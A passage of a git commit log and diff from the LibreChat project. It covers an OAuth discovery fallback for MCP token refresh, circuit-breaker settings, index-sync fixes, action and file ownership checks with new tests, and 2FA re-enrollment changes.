Introduced new tests for the `refreshOAuthTokens` method in `MCPOAuthHandler` to validate the retry mechanism with the origin URL when path-based discovery fails. The tests cover scenarios where the first discovery attempt throws an error and the subsequent attempt succeeds, as well as cases where the discovery fails entirely. This enhances the reliability of the OAuth token refresh process by ensuring proper handling of discovery failures.

* chore: imports order

* fix: Improve Base URL Logging and Metadata Discovery in MCPOAuthHandler

Updated the logging to use a consistent base URL object when handling discovery failures in the MCPOAuthHandler. This change enhances error reporting by ensuring that the base URL is logged correctly, and it refines the metadata discovery process by returning the result of the discovery attempt with the base URL, improving the reliability of the OAuth flow.
2026-03-10 16:19:07 -04:00
Oreon Lothamer
eb6328c1d9
🛤️ fix: Base URL Fallback for Path-based OAuth Discovery in Token Refresh (#12164)
* fix: add base URL fallback for path-based OAuth discovery in token refresh

The two `refreshOAuthTokens` paths in `MCPOAuthHandler` were missing the
origin-URL fallback that `initiateOAuthFlow` already had. With MCP SDK
1.27.1, `buildDiscoveryUrls` appends the server path to the
`.well-known` URL (e.g. `/.well-known/oauth-authorization-server/mcp`),
which returns 404 for servers like Sentry that only expose the root
discovery endpoint (`/.well-known/oauth-authorization-server`).

Without the fallback, discovery returns null during refresh, the token
endpoint resolves to the wrong URL, and users are prompted to
re-authenticate every time their access token expires instead of the
refresh token being exchanged silently.

Both refresh paths now mirror the `initiateOAuthFlow` pattern: if
discovery fails and the server URL has a non-root path, retry with just
the origin URL.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* refactor: extract discoverWithOriginFallback helper; add tests

Extract the duplicated path-based URL retry logic from both
`refreshOAuthTokens` branches into a single private static helper
`discoverWithOriginFallback`, reducing the risk of the two paths
drifting in the future.

Add three tests covering the new behaviour:
- stored clientInfo path: asserts discovery is called twice (path then
  origin) and that the token endpoint from the origin discovery is used
- auto-discovered path: same assertions for the branchless path
- root URL: asserts discovery is called only once when the server URL
  already has no path component

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* refactor: use discoverWithOriginFallback in discoverMetadata too

Remove the inline duplicate of the origin-fallback logic from
`discoverMetadata` and replace it with a call to the shared
`discoverWithOriginFallback` helper, giving all three discovery
sites a single implementation.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* test: use mock.calls + .href/.toString() for URL assertions

Replace brittle `toHaveBeenNthCalledWith(new URL(...))` comparisons
with `expect.any(URL)` matchers and explicit `.href`/`.toString()`
checks on the captured call args, consistent with the existing
mock.calls pattern used throughout handler.test.ts.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-03-10 15:04:35 -04:00
matt burnett
ad5c51f62b
⛈️ fix: MCP Reconnection Storm Prevention with Circuit Breaker, Backoff, and Tool Stubs (#12162)
* fix: MCP reconnection stability - circuit breaker, throttling, and cooldown retry

* Comment and logging cleanup

* fix broken tests
2026-03-10 14:21:36 -04:00
165 changed files with 16554 additions and 1463 deletions

View file

@ -850,3 +850,24 @@ OPENWEATHER_API_KEY=
# Skip code challenge method validation (e.g., for AWS Cognito that supports S256 but doesn't advertise it) # Skip code challenge method validation (e.g., for AWS Cognito that supports S256 but doesn't advertise it)
# When set to true, forces S256 code challenge even if not advertised in .well-known/openid-configuration # When set to true, forces S256 code challenge even if not advertised in .well-known/openid-configuration
# MCP_SKIP_CODE_CHALLENGE_CHECK=false # MCP_SKIP_CODE_CHALLENGE_CHECK=false
# Circuit breaker: max connect/disconnect cycles before tripping (per server)
# MCP_CB_MAX_CYCLES=7
# Circuit breaker: sliding window (ms) for counting cycles
# MCP_CB_CYCLE_WINDOW_MS=45000
# Circuit breaker: cooldown (ms) after the cycle breaker trips
# MCP_CB_CYCLE_COOLDOWN_MS=15000
# Circuit breaker: max consecutive failed connection rounds before backoff
# MCP_CB_MAX_FAILED_ROUNDS=3
# Circuit breaker: sliding window (ms) for counting failed rounds
# MCP_CB_FAILED_WINDOW_MS=120000
# Circuit breaker: base backoff (ms) after failed round threshold is reached
# MCP_CB_BASE_BACKOFF_MS=30000
# Circuit breaker: max backoff cap (ms) for exponential backoff
# MCP_CB_MAX_BACKOFF_MS=300000

View file

@ -149,7 +149,15 @@ Multi-line imports count total character length across all lines. Consolidate va
- Run tests from their workspace directory: `cd api && npx jest <pattern>`, `cd packages/api && npx jest <pattern>`, etc. - Run tests from their workspace directory: `cd api && npx jest <pattern>`, `cd packages/api && npx jest <pattern>`, etc.
- Frontend tests: `__tests__` directories alongside components; use `test/layout-test-utils` for rendering. - Frontend tests: `__tests__` directories alongside components; use `test/layout-test-utils` for rendering.
- Cover loading, success, and error states for UI/data flows. - Cover loading, success, and error states for UI/data flows.
- Mock data-provider hooks and external dependencies.
### Philosophy
- **Real logic over mocks.** Exercise actual code paths with real dependencies. Mocking is a last resort.
- **Spies over mocks.** Assert that real functions are called with expected arguments and frequency without replacing underlying logic.
- **MongoDB**: use `mongodb-memory-server` for a real in-memory MongoDB instance. Test actual queries and schema validation, not mocked DB calls.
- **MCP**: use real `@modelcontextprotocol/sdk` exports for servers, transports, and tool definitions. Mirror real scenarios, don't stub SDK internals.
- Only mock what you cannot control: external HTTP APIs, rate-limited services, non-deterministic system calls.
- Heavy mocking is a code smell, not a testing strategy.
--- ---

View file

@ -1,7 +1,6 @@
const DALLE3 = require('../DALLE3'); const DALLE3 = require('../DALLE3');
const { ProxyAgent } = require('undici'); const { ProxyAgent } = require('undici');
jest.mock('tiktoken');
const processFileURL = jest.fn(); const processFileURL = jest.fn();
describe('DALLE3 Proxy Configuration', () => { describe('DALLE3 Proxy Configuration', () => {

View file

@ -14,15 +14,6 @@ jest.mock('@librechat/data-schemas', () => {
}; };
}); });
jest.mock('tiktoken', () => {
return {
encoding_for_model: jest.fn().mockReturnValue({
encode: jest.fn(),
decode: jest.fn(),
}),
};
});
const processFileURL = jest.fn(); const processFileURL = jest.fn();
const generate = jest.fn(); const generate = jest.fn();

View file

@ -236,8 +236,12 @@ async function performSync(flowManager, flowId, flowType) {
const messageCount = messageProgress.totalDocuments; const messageCount = messageProgress.totalDocuments;
const messagesIndexed = messageProgress.totalProcessed; const messagesIndexed = messageProgress.totalProcessed;
const unindexedMessages = messageCount - messagesIndexed; const unindexedMessages = messageCount - messagesIndexed;
const noneIndexed = messagesIndexed === 0 && unindexedMessages > 0;
if (settingsUpdated || unindexedMessages > syncThreshold) { if (settingsUpdated || noneIndexed || unindexedMessages > syncThreshold) {
if (noneIndexed && !settingsUpdated) {
logger.info('[indexSync] No messages marked as indexed, forcing full sync');
}
logger.info(`[indexSync] Starting message sync (${unindexedMessages} unindexed)`); logger.info(`[indexSync] Starting message sync (${unindexedMessages} unindexed)`);
await Message.syncWithMeili(); await Message.syncWithMeili();
messagesSync = true; messagesSync = true;
@ -261,9 +265,13 @@ async function performSync(flowManager, flowId, flowType) {
const convoCount = convoProgress.totalDocuments; const convoCount = convoProgress.totalDocuments;
const convosIndexed = convoProgress.totalProcessed; const convosIndexed = convoProgress.totalProcessed;
const unindexedConvos = convoCount - convosIndexed; const unindexedConvos = convoCount - convosIndexed;
if (settingsUpdated || unindexedConvos > syncThreshold) { const noneConvosIndexed = convosIndexed === 0 && unindexedConvos > 0;
if (settingsUpdated || noneConvosIndexed || unindexedConvos > syncThreshold) {
if (noneConvosIndexed && !settingsUpdated) {
logger.info('[indexSync] No conversations marked as indexed, forcing full sync');
}
logger.info(`[indexSync] Starting convos sync (${unindexedConvos} unindexed)`); logger.info(`[indexSync] Starting convos sync (${unindexedConvos} unindexed)`);
await Conversation.syncWithMeili(); await Conversation.syncWithMeili();
convosSync = true; convosSync = true;

View file

@ -462,4 +462,69 @@ describe('performSync() - syncThreshold logic', () => {
); );
expect(mockLogger.info).toHaveBeenCalledWith('[indexSync] Starting convos sync (50 unindexed)'); expect(mockLogger.info).toHaveBeenCalledWith('[indexSync] Starting convos sync (50 unindexed)');
}); });
test('forces sync when zero documents indexed (reset scenario) even if below threshold', async () => {
Message.getSyncProgress.mockResolvedValue({
totalProcessed: 0,
totalDocuments: 680,
isComplete: false,
});
Conversation.getSyncProgress.mockResolvedValue({
totalProcessed: 0,
totalDocuments: 76,
isComplete: false,
});
Message.syncWithMeili.mockResolvedValue(undefined);
Conversation.syncWithMeili.mockResolvedValue(undefined);
const indexSync = require('./indexSync');
await indexSync();
expect(Message.syncWithMeili).toHaveBeenCalledTimes(1);
expect(Conversation.syncWithMeili).toHaveBeenCalledTimes(1);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] No messages marked as indexed, forcing full sync',
);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] Starting message sync (680 unindexed)',
);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] No conversations marked as indexed, forcing full sync',
);
expect(mockLogger.info).toHaveBeenCalledWith('[indexSync] Starting convos sync (76 unindexed)');
});
test('does NOT force sync when some documents already indexed and below threshold', async () => {
Message.getSyncProgress.mockResolvedValue({
totalProcessed: 630,
totalDocuments: 680,
isComplete: false,
});
Conversation.getSyncProgress.mockResolvedValue({
totalProcessed: 70,
totalDocuments: 76,
isComplete: false,
});
const indexSync = require('./indexSync');
await indexSync();
expect(Message.syncWithMeili).not.toHaveBeenCalled();
expect(Conversation.syncWithMeili).not.toHaveBeenCalled();
expect(mockLogger.info).not.toHaveBeenCalledWith(
'[indexSync] No messages marked as indexed, forcing full sync',
);
expect(mockLogger.info).not.toHaveBeenCalledWith(
'[indexSync] No conversations marked as indexed, forcing full sync',
);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] 50 messages unindexed (below threshold: 1000, skipping)',
);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] 6 convos unindexed (below threshold: 1000, skipping)',
);
});
}); });

View file

@ -9,7 +9,7 @@ module.exports = {
moduleNameMapper: { moduleNameMapper: {
'~/(.*)': '<rootDir>/$1', '~/(.*)': '<rootDir>/$1',
'~/data/auth.json': '<rootDir>/__mocks__/auth.mock.json', '~/data/auth.json': '<rootDir>/__mocks__/auth.mock.json',
'^openid-client/passport$': '<rootDir>/test/__mocks__/openid-client-passport.js', // Mock for the passport strategy part '^openid-client/passport$': '<rootDir>/test/__mocks__/openid-client-passport.js',
'^openid-client$': '<rootDir>/test/__mocks__/openid-client.js', '^openid-client$': '<rootDir>/test/__mocks__/openid-client.js',
}, },
transformIgnorePatterns: ['/node_modules/(?!(openid-client|oauth4webapi|jose)/).*/'], transformIgnorePatterns: ['/node_modules/(?!(openid-client|oauth4webapi|jose)/).*/'],

View file

@ -4,9 +4,7 @@ const { Action } = require('~/db/models');
* Update an action with new data without overwriting existing properties, * Update an action with new data without overwriting existing properties,
* or create a new action if it doesn't exist. * or create a new action if it doesn't exist.
* *
* @param {Object} searchParams - The search parameters to find the action to update. * @param {{ action_id: string, agent_id?: string, assistant_id?: string, user?: string }} searchParams
* @param {string} searchParams.action_id - The ID of the action to update.
* @param {string} searchParams.user - The user ID of the action's author.
* @param {Object} updateData - An object containing the properties to update. * @param {Object} updateData - An object containing the properties to update.
* @returns {Promise<Action>} The updated or newly created action document as a plain object. * @returns {Promise<Action>} The updated or newly created action document as a plain object.
*/ */
@ -47,10 +45,8 @@ const getActions = async (searchParams, includeSensitive = false) => {
/** /**
* Deletes an action by params. * Deletes an action by params.
* *
* @param {Object} searchParams - The search parameters to find the action to delete. * @param {{ action_id: string, agent_id?: string, assistant_id?: string, user?: string }} searchParams
* @param {string} searchParams.action_id - The ID of the action to delete. * @returns {Promise<Action|null>} The deleted action document as a plain object, or null if no match.
* @param {string} searchParams.user - The user ID of the action's author.
* @returns {Promise<Action>} A promise that resolves to the deleted action document as a plain object, or null if no document was found.
*/ */
const deleteAction = async (searchParams) => { const deleteAction = async (searchParams) => {
return await Action.findOneAndDelete(searchParams).lean(); return await Action.findOneAndDelete(searchParams).lean();

250
api/models/Action.spec.js Normal file
View file

@ -0,0 +1,250 @@
const mongoose = require('mongoose');
const { MongoMemoryServer } = require('mongodb-memory-server');
const { actionSchema } = require('@librechat/data-schemas');
const { updateAction, getActions, deleteAction } = require('./Action');
let mongoServer;
beforeAll(async () => {
mongoServer = await MongoMemoryServer.create();
const mongoUri = mongoServer.getUri();
if (!mongoose.models.Action) {
mongoose.model('Action', actionSchema);
}
await mongoose.connect(mongoUri);
}, 20000);
afterAll(async () => {
await mongoose.disconnect();
await mongoServer.stop();
});
beforeEach(async () => {
await mongoose.models.Action.deleteMany({});
});
const userId = new mongoose.Types.ObjectId();
describe('Action ownership scoping', () => {
describe('updateAction', () => {
it('updates when action_id and agent_id both match', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_1',
agent_id: 'agent_A',
metadata: { domain: 'example.com' },
});
const result = await updateAction(
{ action_id: 'act_1', agent_id: 'agent_A' },
{ metadata: { domain: 'updated.com' } },
);
expect(result).not.toBeNull();
expect(result.metadata.domain).toBe('updated.com');
expect(result.agent_id).toBe('agent_A');
});
it('does not update when agent_id does not match (creates a new doc via upsert)', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_1',
agent_id: 'agent_B',
metadata: { domain: 'victim.com', api_key: 'secret' },
});
const result = await updateAction(
{ action_id: 'act_1', agent_id: 'agent_A' },
{ user: userId, metadata: { domain: 'attacker.com' } },
);
expect(result.metadata.domain).toBe('attacker.com');
const original = await mongoose.models.Action.findOne({
action_id: 'act_1',
agent_id: 'agent_B',
}).lean();
expect(original).not.toBeNull();
expect(original.metadata.domain).toBe('victim.com');
expect(original.metadata.api_key).toBe('secret');
});
it('updates when action_id and assistant_id both match', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_2',
assistant_id: 'asst_X',
metadata: { domain: 'example.com' },
});
const result = await updateAction(
{ action_id: 'act_2', assistant_id: 'asst_X' },
{ metadata: { domain: 'updated.com' } },
);
expect(result).not.toBeNull();
expect(result.metadata.domain).toBe('updated.com');
});
it('does not overwrite when assistant_id does not match', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_2',
assistant_id: 'asst_victim',
metadata: { domain: 'victim.com', api_key: 'secret' },
});
await updateAction(
{ action_id: 'act_2', assistant_id: 'asst_attacker' },
{ user: userId, metadata: { domain: 'attacker.com' } },
);
const original = await mongoose.models.Action.findOne({
action_id: 'act_2',
assistant_id: 'asst_victim',
}).lean();
expect(original).not.toBeNull();
expect(original.metadata.domain).toBe('victim.com');
expect(original.metadata.api_key).toBe('secret');
});
});
describe('deleteAction', () => {
it('deletes when action_id and agent_id both match', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_del',
agent_id: 'agent_A',
metadata: { domain: 'example.com' },
});
const result = await deleteAction({ action_id: 'act_del', agent_id: 'agent_A' });
expect(result).not.toBeNull();
expect(result.action_id).toBe('act_del');
const remaining = await mongoose.models.Action.countDocuments();
expect(remaining).toBe(0);
});
it('returns null and preserves the document when agent_id does not match', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_del',
agent_id: 'agent_B',
metadata: { domain: 'victim.com' },
});
const result = await deleteAction({ action_id: 'act_del', agent_id: 'agent_A' });
expect(result).toBeNull();
const remaining = await mongoose.models.Action.countDocuments();
expect(remaining).toBe(1);
});
it('deletes when action_id and assistant_id both match', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_del_asst',
assistant_id: 'asst_X',
metadata: { domain: 'example.com' },
});
const result = await deleteAction({ action_id: 'act_del_asst', assistant_id: 'asst_X' });
expect(result).not.toBeNull();
const remaining = await mongoose.models.Action.countDocuments();
expect(remaining).toBe(0);
});
it('returns null and preserves the document when assistant_id does not match', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_del_asst',
assistant_id: 'asst_victim',
metadata: { domain: 'victim.com' },
});
const result = await deleteAction({
action_id: 'act_del_asst',
assistant_id: 'asst_attacker',
});
expect(result).toBeNull();
const remaining = await mongoose.models.Action.countDocuments();
expect(remaining).toBe(1);
});
});
describe('getActions (unscoped baseline)', () => {
it('returns actions by action_id regardless of agent_id', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_shared',
agent_id: 'agent_B',
metadata: { domain: 'example.com' },
});
const results = await getActions({ action_id: 'act_shared' }, true);
expect(results).toHaveLength(1);
expect(results[0].agent_id).toBe('agent_B');
});
it('returns actions scoped by agent_id when provided', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_scoped',
agent_id: 'agent_A',
metadata: { domain: 'a.com' },
});
await mongoose.models.Action.create({
user: userId,
action_id: 'act_other',
agent_id: 'agent_B',
metadata: { domain: 'b.com' },
});
const results = await getActions({ agent_id: 'agent_A' });
expect(results).toHaveLength(1);
expect(results[0].action_id).toBe('act_scoped');
});
});
describe('cross-type protection', () => {
it('updateAction with agent_id filter does not overwrite assistant-owned action', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_cross',
assistant_id: 'asst_victim',
metadata: { domain: 'victim.com', api_key: 'secret' },
});
await updateAction(
{ action_id: 'act_cross', agent_id: 'agent_attacker' },
{ user: userId, metadata: { domain: 'evil.com' } },
);
const original = await mongoose.models.Action.findOne({
action_id: 'act_cross',
assistant_id: 'asst_victim',
}).lean();
expect(original).not.toBeNull();
expect(original.metadata.domain).toBe('victim.com');
expect(original.metadata.api_key).toBe('secret');
});
it('deleteAction with agent_id filter does not delete assistant-owned action', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_cross_del',
assistant_id: 'asst_victim',
metadata: { domain: 'victim.com' },
});
const result = await deleteAction({ action_id: 'act_cross_del', agent_id: 'agent_attacker' });
expect(result).toBeNull();
const remaining = await mongoose.models.Action.countDocuments();
expect(remaining).toBe(1);
});
});
});

View file

@ -228,7 +228,7 @@ module.exports = {
}, },
], ],
}; };
} catch (err) { } catch (_err) {
logger.warn('[getConvosByCursor] Invalid cursor format, starting from beginning'); logger.warn('[getConvosByCursor] Invalid cursor format, starting from beginning');
} }
if (cursorFilter) { if (cursorFilter) {
@ -361,6 +361,7 @@ module.exports = {
const deleteMessagesResult = await deleteMessages({ const deleteMessagesResult = await deleteMessages({
conversationId: { $in: conversationIds }, conversationId: { $in: conversationIds },
user,
}); });
return { ...deleteConvoResult, messages: deleteMessagesResult }; return { ...deleteConvoResult, messages: deleteMessagesResult };

View file

@ -549,6 +549,7 @@ describe('Conversation Operations', () => {
expect(result.messages.deletedCount).toBe(5); expect(result.messages.deletedCount).toBe(5);
expect(deleteMessages).toHaveBeenCalledWith({ expect(deleteMessages).toHaveBeenCalledWith({
conversationId: { $in: [mockConversationData.conversationId] }, conversationId: { $in: [mockConversationData.conversationId] },
user: 'user123',
}); });
// Verify conversation was deleted // Verify conversation was deleted

View file

@ -152,12 +152,11 @@ describe('File Access Control', () => {
expect(accessMap.get(fileIds[3])).toBe(false); expect(accessMap.get(fileIds[3])).toBe(false);
}); });
it('should grant access to all files when user is the agent author', async () => { it('should only grant author access to files attached to the agent', async () => {
const authorId = new mongoose.Types.ObjectId(); const authorId = new mongoose.Types.ObjectId();
const agentId = uuidv4(); const agentId = uuidv4();
const fileIds = [uuidv4(), uuidv4(), uuidv4()]; const fileIds = [uuidv4(), uuidv4(), uuidv4()];
// Create author user
await User.create({ await User.create({
_id: authorId, _id: authorId,
email: 'author@example.com', email: 'author@example.com',
@ -165,7 +164,6 @@ describe('File Access Control', () => {
provider: 'local', provider: 'local',
}); });
// Create agent
await createAgent({ await createAgent({
id: agentId, id: agentId,
name: 'Test Agent', name: 'Test Agent',
@ -174,12 +172,83 @@ describe('File Access Control', () => {
provider: 'openai', provider: 'openai',
tool_resources: { tool_resources: {
file_search: { file_search: {
file_ids: [fileIds[0]], // Only one file attached file_ids: [fileIds[0]],
},
},
});
const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions');
const accessMap = await hasAccessToFilesViaAgent({
userId: authorId,
role: SystemRoles.USER,
fileIds,
agentId,
});
expect(accessMap.get(fileIds[0])).toBe(true);
expect(accessMap.get(fileIds[1])).toBe(false);
expect(accessMap.get(fileIds[2])).toBe(false);
});
it('should deny all access when agent has no tool_resources', async () => {
const authorId = new mongoose.Types.ObjectId();
const agentId = uuidv4();
const fileId = uuidv4();
await User.create({
_id: authorId,
email: 'author-no-resources@example.com',
emailVerified: true,
provider: 'local',
});
await createAgent({
id: agentId,
name: 'Bare Agent',
author: authorId,
model: 'gpt-4',
provider: 'openai',
});
const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions');
const accessMap = await hasAccessToFilesViaAgent({
userId: authorId,
role: SystemRoles.USER,
fileIds: [fileId],
agentId,
});
expect(accessMap.get(fileId)).toBe(false);
});
it('should grant access to files across multiple resource types', async () => {
const authorId = new mongoose.Types.ObjectId();
const agentId = uuidv4();
const fileIds = [uuidv4(), uuidv4(), uuidv4()];
await User.create({
_id: authorId,
email: 'author-multi@example.com',
emailVerified: true,
provider: 'local',
});
await createAgent({
id: agentId,
name: 'Multi Resource Agent',
author: authorId,
model: 'gpt-4',
provider: 'openai',
tool_resources: {
file_search: {
file_ids: [fileIds[0]],
},
execute_code: {
file_ids: [fileIds[1]],
}, },
}, },
}); });
// Check access as the author
const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions'); const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions');
const accessMap = await hasAccessToFilesViaAgent({ const accessMap = await hasAccessToFilesViaAgent({
userId: authorId, userId: authorId,
@ -188,10 +257,48 @@ describe('File Access Control', () => {
agentId, agentId,
}); });
// Author should have access to all files
expect(accessMap.get(fileIds[0])).toBe(true); expect(accessMap.get(fileIds[0])).toBe(true);
expect(accessMap.get(fileIds[1])).toBe(true); expect(accessMap.get(fileIds[1])).toBe(true);
expect(accessMap.get(fileIds[2])).toBe(true); expect(accessMap.get(fileIds[2])).toBe(false);
});
it('should grant author access to attached files when isDelete is true', async () => {
const authorId = new mongoose.Types.ObjectId();
const agentId = uuidv4();
const attachedFileId = uuidv4();
const unattachedFileId = uuidv4();
await User.create({
_id: authorId,
email: 'author-delete@example.com',
emailVerified: true,
provider: 'local',
});
await createAgent({
id: agentId,
name: 'Delete Test Agent',
author: authorId,
model: 'gpt-4',
provider: 'openai',
tool_resources: {
file_search: {
file_ids: [attachedFileId],
},
},
});
const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions');
const accessMap = await hasAccessToFilesViaAgent({
userId: authorId,
role: SystemRoles.USER,
fileIds: [attachedFileId, unattachedFileId],
agentId,
isDelete: true,
});
expect(accessMap.get(attachedFileId)).toBe(true);
expect(accessMap.get(unattachedFileId)).toBe(false);
}); });
it('should handle non-existent agent gracefully', async () => { it('should handle non-existent agent gracefully', async () => {

View file

@ -48,14 +48,14 @@ const loadAddedAgent = async ({ req, conversation, primaryAgent }) => {
return null; return null;
} }
// If there's an agent_id, load the existing agent
if (conversation.agent_id && !isEphemeralAgentId(conversation.agent_id)) { if (conversation.agent_id && !isEphemeralAgentId(conversation.agent_id)) {
if (!getAgent) { let agent = req.resolvedAddedAgent;
throw new Error('getAgent not initialized - call setGetAgent first'); if (!agent) {
if (!getAgent) {
throw new Error('getAgent not initialized - call setGetAgent first');
}
agent = await getAgent({ id: conversation.agent_id });
} }
const agent = await getAgent({
id: conversation.agent_id,
});
if (!agent) { if (!agent) {
logger.warn(`[loadAddedAgent] Agent ${conversation.agent_id} not found`); logger.warn(`[loadAddedAgent] Agent ${conversation.agent_id} not found`);

View file

@ -44,13 +44,14 @@
"@google/genai": "^1.19.0", "@google/genai": "^1.19.0",
"@keyv/redis": "^4.3.3", "@keyv/redis": "^4.3.3",
"@langchain/core": "^0.3.80", "@langchain/core": "^0.3.80",
"@librechat/agents": "^3.1.55", "@librechat/agents": "^3.1.56",
"@librechat/api": "*", "@librechat/api": "*",
"@librechat/data-schemas": "*", "@librechat/data-schemas": "*",
"@microsoft/microsoft-graph-client": "^3.0.7", "@microsoft/microsoft-graph-client": "^3.0.7",
"@modelcontextprotocol/sdk": "^1.27.1", "@modelcontextprotocol/sdk": "^1.27.1",
"@node-saml/passport-saml": "^5.1.0", "@node-saml/passport-saml": "^5.1.0",
"@smithy/node-http-handler": "^4.4.5", "@smithy/node-http-handler": "^4.4.5",
"ai-tokenizer": "^1.0.6",
"axios": "^1.13.5", "axios": "^1.13.5",
"bcryptjs": "^2.4.3", "bcryptjs": "^2.4.3",
"compression": "^1.8.1", "compression": "^1.8.1",
@ -66,7 +67,7 @@
"express-rate-limit": "^8.3.0", "express-rate-limit": "^8.3.0",
"express-session": "^1.18.2", "express-session": "^1.18.2",
"express-static-gzip": "^2.2.0", "express-static-gzip": "^2.2.0",
"file-type": "^18.7.0", "file-type": "^21.3.2",
"firebase": "^11.0.2", "firebase": "^11.0.2",
"form-data": "^4.0.4", "form-data": "^4.0.4",
"handlebars": "^4.7.7", "handlebars": "^4.7.7",
@ -106,10 +107,9 @@
"pdfjs-dist": "^5.4.624", "pdfjs-dist": "^5.4.624",
"rate-limit-redis": "^4.2.0", "rate-limit-redis": "^4.2.0",
"sharp": "^0.33.5", "sharp": "^0.33.5",
"tiktoken": "^1.0.15",
"traverse": "^0.6.7", "traverse": "^0.6.7",
"ua-parser-js": "^1.0.36", "ua-parser-js": "^1.0.36",
"undici": "^7.18.2", "undici": "^7.24.1",
"winston": "^3.11.0", "winston": "^3.11.0",
"winston-daily-rotate-file": "^5.0.0", "winston-daily-rotate-file": "^5.0.0",
"xlsx": "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz", "xlsx": "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz",

View file

@ -1,5 +1,6 @@
const { encryptV3, logger } = require('@librechat/data-schemas'); const { encryptV3, logger } = require('@librechat/data-schemas');
const { const {
verifyOTPOrBackupCode,
generateBackupCodes, generateBackupCodes,
generateTOTPSecret, generateTOTPSecret,
verifyBackupCode, verifyBackupCode,
@ -13,24 +14,42 @@ const safeAppTitle = (process.env.APP_TITLE || 'LibreChat').replace(/\s+/g, '');
/** /**
* Enable 2FA for the user by generating a new TOTP secret and backup codes. * Enable 2FA for the user by generating a new TOTP secret and backup codes.
* The secret is encrypted and stored, and 2FA is marked as disabled until confirmed. * The secret is encrypted and stored, and 2FA is marked as disabled until confirmed.
* If 2FA is already enabled, requires OTP or backup code verification to re-enroll.
*/ */
const enable2FA = async (req, res) => { const enable2FA = async (req, res) => {
try { try {
const userId = req.user.id; const userId = req.user.id;
const existingUser = await getUserById(
userId,
'+totpSecret +backupCodes _id twoFactorEnabled email',
);
if (existingUser && existingUser.twoFactorEnabled) {
const { token, backupCode } = req.body;
const result = await verifyOTPOrBackupCode({
user: existingUser,
token,
backupCode,
persistBackupUse: false,
});
if (!result.verified) {
const msg = result.message ?? 'TOTP token or backup code is required to re-enroll 2FA';
return res.status(result.status ?? 400).json({ message: msg });
}
}
const secret = generateTOTPSecret(); const secret = generateTOTPSecret();
const { plainCodes, codeObjects } = await generateBackupCodes(); const { plainCodes, codeObjects } = await generateBackupCodes();
// Encrypt the secret with v3 encryption before saving.
const encryptedSecret = encryptV3(secret); const encryptedSecret = encryptV3(secret);
// Update the user record: store the secret & backup codes and set twoFactorEnabled to false.
const user = await updateUser(userId, { const user = await updateUser(userId, {
totpSecret: encryptedSecret, pendingTotpSecret: encryptedSecret,
backupCodes: codeObjects, pendingBackupCodes: codeObjects,
twoFactorEnabled: false,
}); });
const otpauthUrl = `otpauth://totp/${safeAppTitle}:${user.email}?secret=${secret}&issuer=${safeAppTitle}`; const email = user.email || (existingUser && existingUser.email) || '';
const otpauthUrl = `otpauth://totp/${safeAppTitle}:${email}?secret=${secret}&issuer=${safeAppTitle}`;
return res.status(200).json({ otpauthUrl, backupCodes: plainCodes }); return res.status(200).json({ otpauthUrl, backupCodes: plainCodes });
} catch (err) { } catch (err) {
@ -46,13 +65,14 @@ const verify2FA = async (req, res) => {
try { try {
const userId = req.user.id; const userId = req.user.id;
const { token, backupCode } = req.body; const { token, backupCode } = req.body;
const user = await getUserById(userId, '_id totpSecret backupCodes'); const user = await getUserById(userId, '+totpSecret +pendingTotpSecret +backupCodes _id');
const secretSource = user?.pendingTotpSecret ?? user?.totpSecret;
if (!user || !user.totpSecret) { if (!user || !secretSource) {
return res.status(400).json({ message: '2FA not initiated' }); return res.status(400).json({ message: '2FA not initiated' });
} }
const secret = await getTOTPSecret(user.totpSecret); const secret = await getTOTPSecret(secretSource);
let isVerified = false; let isVerified = false;
if (token) { if (token) {
@ -78,15 +98,28 @@ const confirm2FA = async (req, res) => {
try { try {
const userId = req.user.id; const userId = req.user.id;
const { token } = req.body; const { token } = req.body;
const user = await getUserById(userId, '_id totpSecret'); const user = await getUserById(
userId,
'+totpSecret +pendingTotpSecret +pendingBackupCodes _id',
);
const secretSource = user?.pendingTotpSecret ?? user?.totpSecret;
if (!user || !user.totpSecret) { if (!user || !secretSource) {
return res.status(400).json({ message: '2FA not initiated' }); return res.status(400).json({ message: '2FA not initiated' });
} }
const secret = await getTOTPSecret(user.totpSecret); const secret = await getTOTPSecret(secretSource);
if (await verifyTOTP(secret, token)) { if (await verifyTOTP(secret, token)) {
await updateUser(userId, { twoFactorEnabled: true }); const update = {
totpSecret: user.pendingTotpSecret ?? user.totpSecret,
twoFactorEnabled: true,
pendingTotpSecret: null,
pendingBackupCodes: [],
};
if (user.pendingBackupCodes?.length) {
update.backupCodes = user.pendingBackupCodes;
}
await updateUser(userId, update);
return res.status(200).json(); return res.status(200).json();
} }
return res.status(400).json({ message: 'Invalid token.' }); return res.status(400).json({ message: 'Invalid token.' });
@ -104,31 +137,27 @@ const disable2FA = async (req, res) => {
try { try {
const userId = req.user.id; const userId = req.user.id;
const { token, backupCode } = req.body; const { token, backupCode } = req.body;
